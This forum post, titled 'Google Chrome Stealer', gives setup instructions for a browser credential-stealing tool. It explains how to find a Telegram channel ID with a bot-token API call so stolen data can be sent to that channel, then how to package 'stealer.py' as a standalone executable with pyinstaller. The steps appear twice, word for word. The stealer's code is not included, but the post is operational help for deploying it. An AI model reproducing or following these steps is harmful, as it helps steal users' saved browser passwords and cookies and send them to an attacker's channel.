OP 23 May, 2020 - 06:41 AM
Google Chrome Stealer
To obtain private channel ID:
Convert it to public with some @channelName
Send test message using this URL:
https://api.telegram.org/bot%TOKEN%/sendMessage?chat_id=@channelName&text=test
As response we will get something like this:
{"ok": true, "result": {"chat": {"id": %CHANNEL_ID%, "title": "Test Private Channel", "type": "channel"}, "date": 1448245538, "message_id": 7, "text": "test"}}
Now you can convert it back to private and use obtained ID
To compile stealer:
Install pyinstaller using pip
pip install pyinstaller
Execute following command to compile:
pyinstaller -F stealer.py
To obtain private channel ID:
Convert it to public with some @channelName
Send test message using this URL:
https://api.telegram.org/bot%TOKEN%/sendMessage?chat_id=@channelName&text=test
As response we will get something like this:
{"ok": true, "result": {"chat": {"id": %CHANNEL_ID%, "title": "Test Private Channel", "type": "channel"}, "date": 1448245538, "message_id": 7, "text": "test"}}
Now you can convert it back to private and use obtained ID
To compile stealer:
Install pyinstaller using pip
pip install pyinstaller
Execute following command to compile:
pyinstaller -F stealer.py